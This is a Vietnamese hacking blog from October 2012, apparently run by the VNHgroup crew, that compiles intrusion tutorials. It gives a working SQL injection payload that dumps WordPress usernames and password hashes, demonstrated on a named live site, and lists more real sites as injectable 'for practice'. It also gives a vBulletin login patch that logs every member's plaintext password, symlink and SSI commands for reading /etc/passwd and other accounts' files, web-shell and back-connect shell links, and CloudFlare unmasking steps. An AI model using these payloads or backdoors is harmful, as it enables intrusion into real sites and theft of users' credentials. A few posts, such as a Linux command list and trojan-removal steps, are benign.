Thứ Hai, 29 tháng 10, 2012

WordPress Blog Exploit |inurl:"fbconnect_action=myhome"

search google: inurl:"fbconnect_action=myhome"
thay
?fbconnect_action=myhome&userid=

bằng
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

demo :

http://boneramamusic.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+%20select+1,2,3,4,5,concat(user_login,0x3a,user_pass)%20z%E2%80%8B0mbyak,7,8,9,10,11,12+from+wp_users--

[TUT] Bypass Filter + 403 Forbidden SQL Injection

Mọi người cùng tham khảo cách bypass nhé !



Victim :

Đọc Thêm

Thứ Năm, 25 tháng 10, 2012

Nghịch ChangUonDyU Chatbox[ Dành cho Newbie]


_Lại chào bà con phát nữa,rảnh tiếp làm cái tut cho mấy ku nghịch ( chỉ dành cho mấy master gà ko config chatbox thôi nhá) pro lượn

[+] _Phần 1 ( config mặc định) 

Đọc Thêm

ChangUonDyU - Advanced Statistics SQL injection


010101010101010101010101010101010101010101010101010101010
1 VNHGROUP 0
0 H4cking - S3cure - Und3rGroup 0
010101010101010101010101010101010101010101010101010101010

Đọc Thêm

Share 1 số site dính lỗi Sql cho anh em khai thác... và tập thực hành

http://www.mappn.com/game.php?id=9'
www.theafa.org.uk/members.php?id=9'
http://creationcare.org/blank.php?id=35'
http://www.utahrealestateguide.org/p...iew.php?id=258'
http://casescontact.org/press_re_view.php?ID=32'


Đọc Thêm

Khai thác SQLI " Lầu Xanh "

Bản tóm tắt này không có sẵn. Vui lòng nhấp vào đây để xem bài đăng. Đọc Thêm

Thứ Ba, 23 tháng 10, 2012

[Report] ChangUonDyU Advanced Statistics - SQL injection


Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Đọc Thêm

Cách chiếm cPanel 1 sv


Tải lên sy_conf.pl & htaccess và chmod cả 755
Tải lên B-F.php trong một thư mục khác nhau


.htaccess

http://www.mediafire.com/?4pm551dxidq6zc2
Sy_Conf.pl

http://www.mediafire.com/?r4kkj92ij77r1sf

B-F.php

http://www.mediafire.com/?s58tulka2kmu1d7

Thứ Hai, 22 tháng 10, 2012

3 Thằng "Quay Tay guester.org Để Lấy Vận May "

VNH Die đâm ra anh em rảnh rổi sinh nông nổi :))
Nguyên văn của "Chym To Nhất Họ" như sau :

Còn 3 ngàn ngồi nét ra ku kẻ bảo fuck cái site
http://guester.org/
Thấy bảo này nọ lên đéo biết được,nói chung là nhà đang die qua đó Quậy phát xem

Đọc Thêm

Thứ Năm, 18 tháng 10, 2012

50 câu lệnh Linux phải nhớ


clear: làm sạch cửa sổ dòng lệnh
ls tenthumuc: Liệt kê nội dung bên trong một thư mục
cat tentaptin: Hiển thị nội dung của một tập tin lên cửa sổ dòng lệnh
rm tentaptin: Xóa một tập tin
cp taptinnguon taptindich: Sao chép một tập tin
passwd: Đổi mật khẩu
motd: Thông điệp của ngày
finger tentruycap: Chương trình tìm kiếm thông tin người dùng
startx: Khởi động X Window System server
less tentaptin hoặcr more tentaptin: Hiển thị nội dung một tập tin trong cửa sổ dòng lệnh một trang mỗi lần
info: Hiển thị thông tin và tài liệu trên shell, các tiện ích và chương trình.
lpr tentaptin: Gửi tập tin tới máy tin
grep chuoi tentaptin: tìm kiếm chuỗi trong tập tin
head tentaptin: Hiển thị 10 dòng đầu tiên của tập tin
tail tentaptin: Hiển thị 10 dòng cuối cùng của tập tin
mv tentaptincu tentaptinmoi: Di chuyển hoặc đổi tên tập tin
file tentaptin: Hiển thị thông tin về nội dung của tập tin
echo chuoi: Sao chép chuỗi tới màn hình dòng lệnh
date: Hiển thị ngày và giờ hiện tại
cal: Hiển thị lịch
gzip tentaptin: Nén một tập tin
gunzip tentaptin: Giải nén một tập tin
which lenh: Hiển thị đường dẫn tới lệnh
whereis lenh: Hiển thị đường tới nơi chứa lệnh
who: Hiển thị các người dùng đã đang nhập
finger tentruycap@maychu: Thu thập thông tin chi tiết về người dùng hiện đang dùng hệ thống
w: Hiễn thị người dùng đã đăng nhập với các tiến trình sử dụng
mesg y/n: Đặt tùy chọn để các người dùng khác viết thông điệp cho bạn
write nguoidung: Gửi tin nhắn cho người dùng khác
talk nguoidung: Cho phép 2 người chat với nhau
chmod quyen tentaptin: Thay đổi quyền truy cập tập tin
mkdir tenthumuc: Tạo một thư mục
rmdir tenthumuc: Xóa một thư mục rỗng
ln existingfile new-link: Tạo một đường dẫn tới một tập tin (liên kết cứng)
df: Hiển thị tất cả các mount của hệ thộng
top: Hiển thị danh sách các tiến trình đang chạy
tty: Hiển thị tên của cửa sổ dòng lệnh mà trên đó lệnh được dùng
kill PID hoặc số %job: Ngừng một tiến trình bằng số PID (Process Identification Number) hoặc số công việc
jobs : Hiển thị một danh sách các công việc hiện tại
netstat: Hiển thị các kết nối mạng

Chuyển Data Sang 1 Sever khác


Mục đích: Chạy 3 site Ex: Guester, GUG , VG-UG ở 3 host khác nhau và dùng chung data của 1 host nào đó.

Công việc rất đơn giản. Chúng ta chỉ cần cấu hình trên host H cho phép IP của 3 host A, B, C kia được phép kết nối đên MySQL Server của nó.- Đăng nhập vào Cpanel --> Remote MySQL.


Chỉnh như dưới đây:



Sau đó khi khai báo Config Database tại 3 host Guester, GUG, VG-UG kia. Thông số hostname các bạn sẽ thay thế localhost bằng IP của host #.


Nguồn : Sưu tầm

Thứ Tư, 17 tháng 10, 2012

Share code muagi.vn


Live demo: http://muagi.vn
code:http://www.mediafire.com/download.php?aa14rrj37tqa6nk
data:http://www.mediafire.com/download.php?go1hpgz33gj1va6
Pass giải nén: vnw

Hướng dẫn cài đặt Kloxo trên VPS

Trước khi thực hiện cài đặt Kloxo, chúng ta cần 1 máy chủ VPS hoặc máy chủ riêng tùy theo điều kiện của bạn. VPS phải được cài đặt hệ điều hành Linux CentOS bản 5x. Với các yêu cầu cụ thể như  sau:
- Hệ điều hành: CentOS 52 phiên bản 32bit
- VPS có CPU tối thiểu là 300Mhz
- Ram tối thiểu 256MB
- HDD tối thiểu 3GB
Xem hình ảnh kích thước lớn: Download
Thực hiện cài đặt:
- Truy cập vào VPS bằng SSH


Truy cập VPS bằng SSH client
Tiến hành Update cho CentOS:
# su – root
# yum install -y wge


Update cho CentOS
Đợi cho quá trình update xong, chúng ta tiến hành tải file cài đặt Kloxo:
# wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh
Sau khi tải file cài đặt xong, chúng ta thực hiện setup Kloxo:

#sh ./kloxo-installer.sh --type=master
Hệ thống sẽ tự động tiến hành cài đặt các gói dữ liệu của Kloxo, quá trình này mất khá nhiều thời gian. Đối với VPS quốc tế, bạn chỉ mất khoảng 10p-60p. Đối với  VPS Việt  Nam, do hạn chế đường truyền đi quốc tế, bạn sẽ mất khá nhiều thời gian (khoảng từ 1h – 5h) tùy vào tốc độ kết nối đi quốc tế của  VPS.

Kloxo đang được tự động cài đặt
Trong quá trình cài đặt, sẽ có 1 giai đoạn VPS  tự động tải và bung + cài đặt các gói  ứng dụng rất lâu, điều này khiến cho bạn mất kiên nhẫn chời đợi, tuy nhiên, bạn nên kiên nhẫn, vì giai đoạn này hệ thống tải về khoảng 1,7GB dữ liệu nên khá lâu, đặc biệt là đối với VPS Việt Nam.
Sau khi hệ thống setup hoàn thành, trên màn hình ssh client sẽ báo như  sau:


Cài đặt Kloxo thành công
Bạn tiến hành reboot lại VPS và truy cập vào Kloxo Panel theo địa chỉ:
http://IP:7778 (ví dụ: http://123.201.236.12:7778)
User name mặc định: admin
Password mặc định: admin
Bạn tiến hành config các thông số cần thiết cho Kloxo là có thể sử dụng được. Mọi  vấn đề cần trợ giúp, bạn có thể gửi email đến support@kloxohosting.net hoặc gửi ticket  tại www.kloxohosting.net, hoặc tham khảo thêm tại www.lxlabs.com

Video Upload Shell VBB


[+] video http://www.4shared.com/rar/c05n5a6_/tmtno1.html
[+] shell : http://www.mediafire.com/?y63833jxjppld7s

CloudFlare Bypass [2-TMT]


Tình hình là vừa ngâm cứu, được ku songoku gửu cho cái diễn đàn củ chuối này bảo là của thằng nào VHB ấy quên con mẹ nó rồi

Ping thử thì lại ra thằng chym to nó bảo vệ thử các bắt kia nhưng ko có thôn tin gì .....ngồi đặt bẫy 1 lúc thì cũng bắt được con chym này , nẩy sinh từ cái fake http://cave-viet.com <-- khi face sai mail nó sẽ gửu info server về cho mình

hehe điều này có nghĩa gì ko?

Nói nhảm 1 lúc ---> reg phát cho an lành ( dùng hót meo nhé)

Cám ơn, ChymTO. Việc ghi danh của bạn đã thành công.

Bấy giờ bạn có thể bổ sung thông tin trong phần Hồ Sơ, hoặc bạn có thể điều chỉnh trong phần Chức Năng để sử dụng diễn đàn hơn. Bạn không nhất thiết phải làm bây giờ nhưng nếu sau này bạn muốn thì có thể vào phần Ðiều Chỉnh Hồ Sơ để thay đổi những thông tin bạn muốn.

Bạn có thể bấm vào đây để trở về diễn đàn.
Ok giờ check mail xem sao...tùm tèn đã có mail chào mừng :)) chết bà mày ông sắp bắt đc chym bé rồi :))

giờ view source lên ở phần 


và cuối cùng ta tóm được chym bé :x


Authentication-Results: hotmail.com; sender-id=none (sender IP is 112.78.8.55[) header.from=webmaster@maze-gamevn.com; dkim=none header.d=maze-gamevn.com; x-hmca=none
X-SID-PRA: webmaster@maze-gamevn.com
X-DKIM-Result: None
X-SID-Result: None
X-AUTH-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD00
X-Message-Info: M98loaK0Lo27IVRxloyPIYugp41x7kap+1oECsaaowgX3KjSMpGPd82yGIyOEI8LD5zoD6/uYI/ascsa1Vz0loszMRbrS18sOMQYW8FsczVADByy3C9VA0SawAi5EQI1Inf8uqrJr+tnhHmqEA6LWg==
Received: from [COLOR="#FF0000"]server-112-78-8-55.domainhostingvn.com ([112.78.8.55])[/COLOR] by COL0-MC4-F36.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
     Mon, 15 Oct 2012 05:00:10 -0700
Địa chỉ cháu nó đây
/home/mazegame/public_html/@rum
And tut...TMT-VNHgroup

CloudFlare Bypass [TMT]

Bài này mình hướng dẫn cách lấy ip chính của mấy thằng sài DNS này , tùy vào trường hợp nếu nó login vào host để upload hay edit file thì ta mới lấy được info nhé Trước tiên vàohttp://toolbar.netcraft.com/site_report?url=http://www.worldofhacker.com ta được cái đống ip này
 Chúng ta để ý
IP address 199.27.134.50   đây là ip khi ta ping
Virtual servers    178.162.152.80    Linux    lighttpd/1.4.20    16-Mar-2011<-- là địa chỉ ip khi nó login để
tiếp theo đó scan bằng nmap ta được


Các bạn nhìn thấy giờ hơm , port 7777 là của koloxo vậy thử đánh
http://178.162.152.80:7778/login/ <--- ra cái gì thế :x

http://178.162.152.80  <-- chạy hẳn trên web
tiếp là reverser ip
http://ip.iuvn.net/Reverse-IP-Lookup-DNS-Domain/178.162.152.80.html


Đến đây là các bạn biết làm gì rồi đó, còn với trường hợp mà ko có "Hosting History"thì mình sẽ viết sau...and tut

TMT-VNHgroup

share code vietnam3g.com


Mã:

http://www.mediafire.com/?alkvr9ah61345az

pass: vnhack.us
demo : vietnam3g.com

share blog9x.mobi

Mã:
http://www.mediafire.com/?zcxnz689dhyd5mc
demo : blog9x.mobi
pass: vnhack.us

share code duatop.net





Code + data
http://www.mediafire.com/?8s6vd8fbw7aebj2
pass: vnhack.us


Thứ Ba, 16 tháng 10, 2012

Tổng hợp TUT local căn bản cho NB


http://www.mediafire.com/?pd10l797f5haw
==================================
Một số tut khác
====================================
Up shell vbb mọi phiên bản (hướng dẫn từ a -gt; z)
http://www.mediafire.com/?gbb3xyhpx2iwoat
pass: tranhoai
====================================
Local hostvn
http://www.mediafire.com/?dhpbve4z1b8gio1
=================================
Tut SQL + up shell +local (tổng hợp)


1.Tìm site lỗi SQL và khai thác
2.Login với quyền admin để up shell
3.Local sang các site khác cùng server
http://www.mediafire.com/?xr10n8nczr8du9q
=================================
Local bằng cách up Cgi-Telnet -


http://www.mediafire.com/download.php?djnmntmgacm
=============================================
Local + Upload shell Joomla chi tiết


http://www.mediafire.com/?3hqep6ku7528vub


pasS: 25071989
==================================
Upload Shell PHPMYADMIN
Link : http://www.mediafire.com/?7rvuy2a62b40k23
Pass : BYG
==================================
một số video khác


http://www.mediafire.com/download.php?tgjd4bnnzdy
http://www.mediafire.com/download.php?ee1ztyyj32n
http://www.mediafire.com/download.php?mwizmitjmmo
http://www.mediafire.com/download.php?iynzjmjjn4y
http://www.mediafire.com/download.php?zjzvenhd1ma
http://www.mediafire.com/download.php?lmq5jlhjxok
http://www.mediafire.com/download.php?jinkzmwmmzy
http://www.mediafire.com/download.php?oimmn2yjnj0
http://www.mediafire.com/download.php?xbonumjzyqz


pass : bocapit

================================================


Local basic
http://www.mediafire.com/?jiki40gwjzx
===========================
Local via sql
http://www.mediafire.com/?w2moq5ygwzy
============================
Tut hướng dẫn chi tiết local thay pass MD5 cho NB
http://www.mediafire.com/?kt4qtkqvma6xusj
=============================
local
http://www.mediafire.com/?lnx6ph8978ljt92
===============================
Vài con shell cần thiết khi local cho anh em!
Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server
http://www.mediafire.com/?45fsa46y5bdobfa

Telnet 1.3
http://www.mediafire.com/?eayxc5k8utpqeig
.htaccess
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg

RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
~gt; 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về

Admin Finder (tìm thư mục admin)
http://www.mediafire.com/?skaysiedncckx4k

cmd.shtml gt; view source cmd.shtml
lt;!--#exec cmd=quot;dir /home/victim/public_html/quot; --gt;

cmd.shtml (1.txt là file đã được symljnk) gt; view source cmd.shtml
lt;!--#include virtual='1.txt'--gt;

Bypass ln.zip
lt;?php
chmod('ln',0777);
system('./ln -s /etc/passwd gt; 1.txt');
?gt;
hoặc
./ln -s /home/victim/public_html/index.php 1.txt
File SymLink.php
/home/victim/public_html/index.php

Find Path qua error-log : http://victim.com/fuck
tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck

Shell offline.php?acc ~gt; get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ
http://www.mediafire.com/?r19m52itzq71x5z

Backuper.php (Leech code)
http://www.mediafire.com/?kp1p40fnwc2171k

Shell Unkonw (Brute)
http://www.mediafire.com/?hvxjzrm1tjgbwmp

Shell images (r57)
http://www.mediafire.com/?lh0nslgadbsb5ab

Shell images (Webadmin)
http://www.mediafire.com/?lc6cizbpw5ijoio

Shell Dumper.php (Zip + Restor data)
http://www.mediafire.com/?9ecl9efdk4mw3hm

Shell images aaa.php.jpg - shell upload
http://www.mediafire.com/i/?d61ubhb1qw11dst

Shell help.php (upload file + chmod)
http://www.mediafire.com/?ytwx6mv4ee2266l

Unzip.php (giải nén các file bị zip)
http://www.mediafire.com/?1bhs7jmvly3e1b4
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
http://www.mediafire.com/?ims0mlwa9e3yzl1

telnet v1.3 (ko cần htaccess)
http://www.mediafire.com/?t1uu3cr6h6aag5c

sym-pl.pl (symljnk cgi ko cần htaccess)
http://www.mediafire.com/?o8fm7bmw90882hq

Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
http://www.mediafire.com/?f86f88nfesduuyp

Locus Shell (back connect)
http://www.mediafire.com/?0vk8v5m8kzcqgvf

perl shell mr.thien (BackConnect)
http://www.mediafire.com/?qedquldy39ilgn9

Ỏ trên là toàn bộ video mình sưu tầm từ web ,blog, post lên cho NB như mình. mong nhân được cái thank từ các bạn.

Gắn Virus vào Email


gắn virus vào phần nội dung mail 
vì các đoạn Script có khả năng hoạt động nếu như một máy dùng trình duyêt IE cho phép chạy ActiveX vì vậy virus cũng có thể lây theo đường này gắn virus vào file gắn kèm ( Attach files) 
Virus xây dựng các file dính kèm bằng những thủ thuật sau : 
để tránh bị lộ diện virus tạo file bằng 2 phần đuôi 
ví dụ aaaa.doc.exe 
chính vì vậy mà virus tạo ra file này như thế nào : 
tìm trong thư mục my documents và lấy tên của các file tìm thấy 
ví dụ : bbbb.doc nó sẽ lưu tên này vào phần dữ liệu , nếu như khi cần gởi thì nó sẽ tạo ra file bbbb.doc.exe để dính kèm vào thư , sau đó tiến hành việc mã hóa theo chuẩn MINE hay Base64 các đoạn mã này do virus tự làm 
Gởi mail 
Để gởi mail virus có thể tự xây dựng cho mình một cơ cấu SMTP riêng hoặc dựa trên các hàm MAPI trong thu viện MAP32DLL , như MAPILogon, MAPISendMail, MAPISendDocument 
VII)Kỹ thuật phá hoại : 
1) Các virus ngoải những cách phá hoại thông thường còn có khả năng gây ra tấn công theo kiểu ngăn chặn dịch vụ DOS , ví dụ chúng cho một server nào đó mở một port và điều khiển các máy bị nhiễm truy cập vào server này làm cho số nối kết đến máy chủ vượt quá cho phép 
2) Mở một port cho phép truy cập vào máy bị nhiễm 
3) Có khả năng cho phép điều khiển từ xa 
4) Có thể tấn công máy in vì tưởng rằng máy in cũng là một máy tính nào đó 
VIII ) Những khả năng nào khiến cho bạn bị nhiễm Virus hoặc Trojan 
A) Do chính bạn 
1) Khi bạn truy cập vào một số trang web mà các trang này bị nhiễm virus hoặc Tojan rồi 
2) Download những file đã bị nhiễm 
3) Nhận mail đã bị nhiễm 
4) Nhận một số file từ một người đang chat với bạn 
5) Mua disk CD ở ngoài đã bị nhiễm 
6) Bạn cho Phép một người khác đem file bị nhiễm vào máy mình 
7) Do một số chương trình bạn đang dùng đã được chính hãng gài vào 
Do Người khác cố ý 
1) Do máy bạn đã được hacker viếng thăm 
2) Do người yêu bạn gài vào theo dõi bạn mà bạn không biết 
3) Do người bạn thân của bạn 
4) Do người bán máy cho bạn gài vào 
5 )Do những hãng sản xuất phần cứng gài vào trong các driver 
6) Do hãng sản xuất ra phần mền 
7) Do hãng sản xuất HĐH 
Do KTV bạn mời đến sữa máy cho bạn gài vào 
Bạn sẽ không bao giờ có thể thoát được nếu như có một đối tượng nào đó cố ý gài vài 
IX) Cách Thức Remove Trojan 
Dựa vào đặc điểm của Trojan ta có cách remove nó như sau : 
Vì trojan hoạt động cần phải được kích hoạt nên ta tìm cách không cho nó kích hoạt , vỉ vậy muốn diệt được trojan cần phải kiểm tra tất cả những vị trí sau : 
Trong các Autostart Folder : 
ví dụ file khởi động của trojan là trojan.exe thì 
C:\Windows\Start Menu\Programs\startup\trojan.exe 
+ Trong file C:\windows\Win.ini tại dòng lệnh 
load=Trojan.exe 
hoặc run=Trojan.exe 
+ Trong file c:\windows\system.ini sau dòng lệnh shell 
Shell=Explorer.exe trojan.exe 
Trojan sẽ tự động chạy khi file Explorer.exe chạy 
+ Trong Autoexec.bat 
c:\....\Trojan.exe 
+ Explorer Startup 
c:\explorer.exe,c:\...\trojan.exe 
+ Tạo một khóa trong Registry : 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run] 
"trojan"="c:\...\Trojan.exe" 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce] 
"trojan"="c:\...\Trojan.exe" 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices] 
"trojan"="c:\...\Trojan.exe" 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce] 
"trojan"="c:\...\Trojan.exe" 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run] 
"trojan"="c:\...\Trojan.exe" 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce] 
"trojan"="c:\...\Trojan.exe" 
- Trong Registry Shell Open với key là "%1 %*" 
[HKEY_CLASSES_ROOT\exefile\shell\open\command] 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\ open\command] 
trojan.exe "%1 %*" 
del tất cả các dòng lệnh có file mà trojan boot ở đây ví dụ là file trojan.exe 
- Trong 1 số ứng dụng mà cho phép một số chương trình co the chay : 
ví dụ ICQ 
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\App s\] 
- Trong ActiveX 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName] 
StubPath=C:\...\Trojan.exe 
nếu như nó lây nhiễm qua một mIRC thì vào cửa sổ của nó 
1.đánh /unload -rs script.ini 
sẽ nhìn thấy : *** Unloaded script.ini 
2. đánh command.com /c attrib.exe -s -r script.ini 
3.đánh /write -c script.ini 
4.đánh /remove script.ini 
sẽ nhìn thấy : *** Removed 'c:\mirc\script.ini'. 
5.đánh //say $exists(script.ini) 
nếu $false lặp lại bước 2 đến bước 4 
6.đánh /sreq ask 
7.đánh /creq ask 
8.đábg /dccserver off 
9. Thay đổi tất cả các pass của bạn

Cài Keylogger cho VBB


<b>Cái này sẽ ghi lại pass của mọi thành viên khi họ đăng nhập vào 1 file ta định sẵn

-edit file login.php
tìm:
Trích dẫn
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);


thêm vào bên dưới:
Trích dẫn
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = “./modcp/test.html“;

$sql_query = @mysql_query(”SELECT * FROM ” . TABLE_PREFIX . “user WHERE username=’” . $lg_username . “‘”);

while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, “a+”); @fwrite($fp1, $lg_username . ‘ : ‘ . $lg_password.” (” . $row["email"] . “)\n”);
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, “w”);
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}



- Edit file global.php:
Tìm
Trích dẫn
$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates


Thay bằng:
Trích dẫn
//$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates



- Nếu gặp lỗi các bạn có thể vào file global.php tìm
Trích dẫn

eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);


Và thay thể bằng
Trích dẫn

//eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
//eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
//eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);



File chứa Password sẽ được lưu ở đây:
/modcp/test.htm

Nguồn:http://phongdatgl.biz/blog/read.php?88#ixzz29N4xZTpP</b>

Chủ Nhật, 7 tháng 10, 2012

Tìm user của victim khi local

Khi local các bạn ít nhiều cũng gặp khó khăn khi tìm path của victim ,bài này mình sẽ chia sẻ 1 chút kinh nghiệm của mình.
Đầu tiên và cũng là cách đơn giản nhất ,đọc file /etc/passwd và đoán user dựa trên domain

cat /etc/passwd

nếu bị server chặn lệnh cat ,bạn thử symlink nó

ln -s /etc/passwd list.txt

hoặc nếu hàm readfile chưa bị disable ,bạn cũng có thể tận dụng nó, tạo 1 file php nội dung như sau

<?php
readfile('/etc/passwd');
?>

Sau đó tiến hành đoán ,user thường giống với domain ,đã loại bỏ kí tự “-” trong domain, đôi khi loại bỏ cả số trong domain.

Cách trên là cơ bản ,nếu domain của victim là domain chính của host ,còn trường hợp là addon domain thì bó tay sao ?
Thử tìm trong logs ,ở đây là error_log ,vào domain victim và tạo ra một error trên trang đó (404 chẳng hạn) rồi tiến hành đọc error_log

tail -1000 /usr/local/apache/logs/error_log

vì các file log này dung lượng rất lớn ,đọc toàn bộ là điểu không khả thi ,chúng ta chỉ cần 1000 dòng cuối cùng trong error_log này ,nó sẽ log cái error mà ta vừa tạo ra trên domain của victim.
Path log trên là khi host dùng cpanel ,đối với directadmin ta có thể tìm được ở /var/log/directadmin/error.log

Trường hợp domain victim dùng mod_rewrite ,tất cả các truy vấn đều hợp lệ thì error_log sẽ không được tạo ra ,thì ta sẽ tiếp tục đọc access_log ,sử dụng lệnh grep để tìm đúng domain mình cần.

grep -i ‘domain.com’ /usr/local/apache/logs/access_log

hoặc lệnh egrep để tìm nhiều domain cùng lúc

egrep -w ‘domain1|domain2|domain3′ /usr/local/apache/logs/access_log

Cuối cùng, cũng là cách mang tính hên xui rất cao nhưng không phải là không được đó là tìm trên google ,search với từ khóa
1

site:domain.com "warning"

và như thế ,bất kì lỗi nào trên website domain.com bị google index đều hiện ra ,và biết đâu trong đó có path của file lỗi ,và thế là ta tìm được user của victim.

Nguồn :Sưu tầm